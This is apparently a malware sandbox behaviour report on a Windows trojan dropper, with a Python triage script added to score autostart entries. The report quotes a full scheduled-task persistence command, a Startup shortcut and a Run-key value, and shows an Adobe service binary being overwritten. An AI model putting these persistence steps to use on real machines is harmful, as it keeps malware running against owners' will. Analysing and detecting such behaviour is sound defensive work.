Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wisrysxl.PIF
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif

Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl Jump to behavior
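The three persistence mechanisms listed under Boot Survival (a scheduled task that re-runs the payload every minute for the whole day, a shortcut in the per-user Startup folder, and an HKCU Run value) are the kind of evidence a detection engineer turns into triage logic. The following is an added example, not part of the sandbox report and not code from the malware or from Joe Sandbox: it parses behaviour lines in the report's own "Source: ... Process created / File created / Registry value created or modified" shape, scores each autostart write by how many suspicious traits it carries, and ranks them. The sample lines are constructed; the first three mirror the evidence above, the fourth (a vendor updater task under Program Files) is invented purely for contrast. The user-writable directory list, the 5-minute repeat threshold and the scoring are assumptions of the example, not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the report's own line shape. The first three mirror the
# Boot Survival evidence; the last is an invented benign vendor task for contrast.
SAMPLE_EVENTS = [
    'Source: C:\\Users\\user\\AppData\\Local\\Temp\\server_BTC.exe Process created: '
    'C:\\Windows\\SysWOW64\\schtasks.exe "schtasks.exe" /create /tn AccSys '
    '/tr "C:\\Users\\user\\AppData\\Roaming\\ACCApi\\TrojanAIbot.exe" '
    '/st 11:05 /du 23:59 /sc daily /ri 1 /f',
    'Source: C:\\Users\\user\\AppData\\Local\\Temp\\server_BTC.exe File created: '
    'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\TrojanAIbot.exe.lnk',
    'Source: C:\\Users\\user\\AppData\\Local\\Temp\\x.exe Registry value created or modified: '
    'HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Wisrysxl',
    'Source: C:\\Program Files\\Vendor\\updater.exe Process created: '
    'C:\\Windows\\System32\\schtasks.exe "schtasks.exe" /create /tn VendorUpdate '
    '/tr "C:\\Program Files\\Vendor\\updater.exe" /sc weekly',
]

# Assumed: locations an unprivileged user can write to. Autostart entries that
# point there deserve more scrutiny than ones under Program Files or Windows.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) "
    r"(?P<event>Process created|File created|Registry value created or modified): "
    r"(?P<rest>.+)$"
)


@dataclass
class Finding:
    kind: str          # scheduled_task | startup_folder_lnk | run_key
    source: str        # process that created the autostart entry
    target: str        # what gets started at logon / on schedule
    reasons: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE)


def parse_schtasks(cmdline: str) -> Optional[dict]:
    """Pull action, repeat interval, schedule and /f out of a `schtasks /create` line."""
    if "/create" not in cmdline.lower():
        return None
    tr = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    ri = re.search(r"/ri\s+(\d+)", cmdline, re.I)
    sc = re.search(r"/sc\s+(\w+)", cmdline, re.I)
    return {
        "target": (tr.group(1) or tr.group(2)) if tr else "",
        "repeat_min": int(ri.group(1)) if ri else None,
        "schedule": sc.group(1).lower() if sc else None,
        "force": re.search(r"/f\b", cmdline, re.I) is not None,
    }


def assess(line: str) -> Optional[Finding]:
    """Turn one behaviour line into a Finding, or None if it is not an autostart write."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, event, rest = m.group("src"), m.group("event"), m.group("rest")
    if event == "Process created":
        task = parse_schtasks(rest)
        if task is None:
            return None
        f = Finding("scheduled_task", src, task["target"])
        if user_writable(task["target"]):
            f.reasons.append("task action lives in a user-writable directory")
        if task["repeat_min"] is not None and task["repeat_min"] <= 5:
            f.reasons.append(f"re-runs every {task['repeat_min']} min (restarts the payload if killed)")
        if task["force"]:
            f.reasons.append("/f overwrites an existing task of that name without prompting")
    elif event == "File created":
        low = rest.lower()
        if STARTUP_DIR not in low or not low.endswith(".lnk"):
            return None
        f = Finding("startup_folder_lnk", src, rest)
        f.reasons.append("shortcut dropped into the per-user Startup folder")
    else:
        key, _, value_name = rest.rpartition(" ")
        if not key.lower().endswith(RUN_KEYS):
            return None
        f = Finding("run_key", src, f"{key}\\{value_name}")
        f.reasons.append("new value under a Run/RunOnce autostart key")
    if user_writable(src):
        f.reasons.append("writer itself runs from a user-writable directory")
    return f


def triage(lines) -> list:
    """Score every line and return the findings, most suspicious first (stable order on ties)."""
    findings = [f for f in map(assess, lines) if f is not None]
    return sorted(findings, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.score}] {f.kind}: {f.target}")
        for r in f.reasons:
            print(f"      - {r}")
```

On the sample the AccSys task scores highest: its action sits under AppData\Roaming, it is created by a process that itself runs from Temp, `/ri 1` with `/du 23:59` restarts the payload every minute all day, and `/f` silently replaces any task already named AccSys. The invented vendor task scores zero, which is the point of scoring traits rather than matching on `schtasks /create` alone.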

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_02E5AB1C
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
